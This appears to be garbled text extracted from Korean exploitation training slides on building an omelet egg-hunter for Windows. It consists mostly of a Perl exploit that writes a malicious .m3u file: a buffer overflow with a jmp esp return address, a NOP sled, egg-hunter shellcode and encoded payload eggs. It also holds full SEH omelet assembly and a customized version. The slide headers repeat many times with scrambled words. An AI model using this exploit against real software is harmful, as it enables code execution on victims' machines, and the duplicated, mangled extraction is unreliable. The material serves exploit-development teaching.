inserted at least once). They are 127 bytes each: egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4 2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D x37x42x43x45x31x42x4C x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4 0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x 40x40x40x40x40x40x40x40"; egg0 egg1 egg2
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; open($FILE,">$file"); print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3; close($FILE); print "m3u File Created successfullyn";
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 접근 위반 발생 (Access violation when reading [00000000]
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis jump to shell code my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; omit…
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; omit… for nop sled omelet code for finding eggs
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; EDI → 0x00000000 omit… for nop sled omelet code for finding eggs
start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: EDI → 0x00000000 PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ Access Violation REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
egg1 egg2 egg3 !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg1.bin" !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg2.bin" !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg3.bin"
egg1 (0x000FDxxx) egg2 (0x000FDxxx) egg3 (0x000FDxxx)
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1 my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $shlEDI = "x66xBFx80x1FxD1xE7xD1xE7xD1xE7xD1xE7xD1xE7". “xD1xE7xD1xE7”; #0x1F80 shift x 7 my $omelet_code = "x90x90xEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08";
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1 my $shlEDI = "x66xBFx80x1FxD1xE7xD1xE7xD1xE7xD1xE7xD1xE7". “xD1xE7xD1xE7”; #0x1F80 shift x 7 my $omelet_code = "x90x90xEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08";
omit…
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) custom_w32_SEH_omelet.asm BITS 32 ; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg) marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode. db marker_bytes_location db max_index_location db egg_size_location
